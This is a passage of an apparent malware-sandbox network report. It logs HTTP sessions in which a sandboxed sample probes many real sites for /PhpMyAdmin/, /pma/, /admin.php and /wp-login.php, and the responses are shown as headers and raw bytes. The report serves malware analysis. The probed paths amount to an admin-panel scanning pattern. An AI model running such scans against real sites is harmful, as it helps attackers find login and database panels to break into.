                                                                                                                                                                                                                                                                                                                                                                Data Raw: 33 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 300Y{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/TaW(hX\$qE|:+"xdU hj4r"4)I9i$[ol:SN`AvZ69)IRY]%;Pc[[0<


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                492192.168.2.66526044.195.133.14580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.146436930 CET179OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.263190031 CET582INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-control: no-cache="set-cookie"
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://ucv.blackboard.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EA298EECDFAB0EDA1FF6AD3E90D0B14C56C348EF11DCF1C015A556B18100061CD;PATH=/;MAX-AGE=900
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 175
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.2</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                493192.168.2.665250164.100.128.1580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.146816969 CET176OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: upsconline.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.532030106 CET139INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://upsconline.nic.in/admin.php
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                494192.168.2.665257202.81.112.3280
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.146864891 CET184OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: testconnect.garena.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.470675945 CET358INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://testconnect.garena.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                495192.168.2.66525377.240.114.21280
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.146922112 CET173OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mw.redsa.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.364701986 CET437INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:09 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Location: https://mw.redsa.net/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 240
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 77 2e 72 65 64 73 61 2e 6e 65 74 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://mw.redsa.net/PhpMyAdmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                496192.168.2.66534931.13.88.180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.156661034 CET180OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: th-th.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.258752108 CET214INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://th-th.facebook.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                497192.168.2.665340170.114.52.480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.167551041 CET174OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: us04web.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.294943094 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:16:26 GMT
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=cz6OvsiBACg0ZCMyEcNWjbl1FV6qUh4fJWLOzoM7ke4-1707131771-1-AeliCr4RJ4TDTW07imlxSGnq+BG0fXlLsV76PHmEnSJ4lQXHmOyeJ1m5RXtNVtKmhyZbaDR0hnTLhqC7yUEN9xg=; path=/; expires=Mon, 05-Feb-24 11:46:11 GMT; domain=.us04web.zoom.us; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UKcl7Cl4r4Qvs5PBdaVATklz6Oakkw9Ec0vq2wFiMZqKqfxHWlb479b8sRMYAPHB8KQH2TwQlNvRRKDsrVfcNGj4bOw0eyxinclL5h94ioo0%2F%2BWhB1f6xH7lp43xIohZKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd621c33b08e-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 36 63 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f e3 b8 11 fe ee 5f 31 51 81 c4 06 2c c9 de 97 db d4 91 55 5c 77 53 20 c0 16 b7 bd cd a2 5d 1c 16 01 45 8e 2c 5e 28 52 25 29 2b 6e 2e ff fd 40 51 b2 e5 97 e4 ba 68 81 00 11 c5 e1 33 33 0f 9f 19 91 4e ce 3e fc f4 fe f6 eb a7 6b 28 6c 29 d2 51 72 16 86 bf f0 1c 84 85 9b 6b 78 f7 2d 85 c4 4d 00 15 c4 98 65 20 55 f8 ab 01 8e 3f 80 12 8c 63 00 82 c8 d5 32 40 19 7e f9 1c a4 90 9c fd 82 92 f1 fc 5b 18 ee a0 3a 1c 80 d3 50 ef be 0f ea f2 05 a8 cb ef 80 5a d9 0e cd bd 38 95 e5 31 4a 18 ee 23 15 48 58 3a 4a 2c b7 02 d3 1f ad 45 69 b9 92 f0 33 fe bb e6 1a d9 19 fc 06 ef 85 aa 59 2e 88 c6 24 f6 76 a3 a4 44 4b 80 16 44 1b b4 cb e0 cb ed df c2 cb 00 e2 7e a2 b0 b6 0a 1d c2 7a 19 bc 57 d2 81 86 b7 9b 0a 03 a0 7e b4 0c 2c 3e d8 d8 c5 7b b5 85 79 09 e5 5f e1 97 1f c3 f7 aa ac 88 e5 99 18 02 dd 5c 2f af d9 0a 07 eb
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6cbXmo_1Q,U\wS ]E,^(R%)+n.@Qh33N>k(l)Qrkx-Me U?c2@~[:PZ81J#HX:J,Ei3Y.$vDKD~zW~,>{y_\/
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.294955969 CET762INData Raw: 24 29 71 19 68 95 29 6b 06 86 52 71 c9 f0 61 0a 52 e5 4a 08 d5 1c 2d 59 73 6c 2a a5 ed 60 51 c3 99 2d 96 0c d7 9c 62 d8 0e a6 5c 72 cb 89 08 0d 25 02 97 73 8f 22 b8 bc 07 8d 62 19 18 bb 11 68 0a 44 1b 00 67 cb 80 e6 77 fe 55 48 8d 09 a0 d0 98 2f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: $)qh)kRqaRJ-Ysl*`Q-b\r%s"bhDgwUH/2TLVDQ|?KwqsyC/{GjhLcI"qZFo>48J0>dW*Q9^Kdxhdck#7%)"ZV~5h,)Z(mB
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.294969082 CET701INData Raw: 89 c1 29 10 f8 fc 8f 8f 40 55 59 12 d9 4e 94 44 74 21 3a d2 a2 24 ae d2 63 75 fd 1f b7 55 a3 51 62 8d 7b 5b eb f2 23 12 6e 80 29 c7 76 67 d2 66 f9 9d 1b dc a3 f7 9b ec 1a 8c 83 c6 92 70 e1 a9 77 db ad 1a a7 7f ab 40 a0 75 6f 4b b8 97 aa 69 f7 ad
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: )@UYNDt!:$cuUQb{[#n)vgfpw@uoKiqEtO2BBZ1n~C*BD+p:L6prUKu)A<'{WuRw@MrQm7V;H1-dJ3Q~0+M6MR0'5


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                498192.168.2.665350104.22.74.22080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.170756102 CET174OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mojadovera.sk
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.301948071 CET345INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://mojadovera.sk/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd622dd45080-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                499192.168.2.665356142.250.105.8480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.176917076 CET180OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.300578117 CET485INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.300590038 CET184INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef a6 bd 96 18 48 6b ac 05 c5 22 39 b4 47 89 8b 11 8c 11 8d 05 ff be 31 ed b1 73 59 76 76 18 de d2 5c 96 05 8b 68 2e 78 ea 87 bc cb 42 b0 d2 be a1 45 12 cc 64 e7 66 ee 87 8d 92 ef
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHHk"9G1sYvv\h.xBEdf!T]n xJ{Hj@U!,(E`i VffX2|


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                500192.168.2.665357142.250.105.8480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.176965952 CET173OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.301479101 CET478INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/pma/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.301655054 CET178INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef a6 bd 96 18 d0 1a 6b 41 11 24 87 f6 18 e2 62 0a c6 48 8c 85 fe 7d 63 da 63 e7 b2 ec ec 30 bc a5 b5 68 1b 96 d0 9a e7 65 18 e2 26 1a ce 5a fb 82 01 09 30 8b 75 d2 3d a7 37 25 df
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHkA$bH}cc0he&Z0u=7%CB/XtKt}UFEXQx=kn"4+21GsT~YH65'H5d1`%9K;


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                501192.168.2.6653523.141.96.5380
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.370207071 CET174OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: money-farm.cc
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.492969036 CET149INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                location: https://money-farm.cc/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                502192.168.2.66535834.149.46.13080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.370287895 CET175OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.472712994 CET204INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.snapchat.com:443/pma/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                503192.168.2.665359142.250.105.8480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.370822906 CET180OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
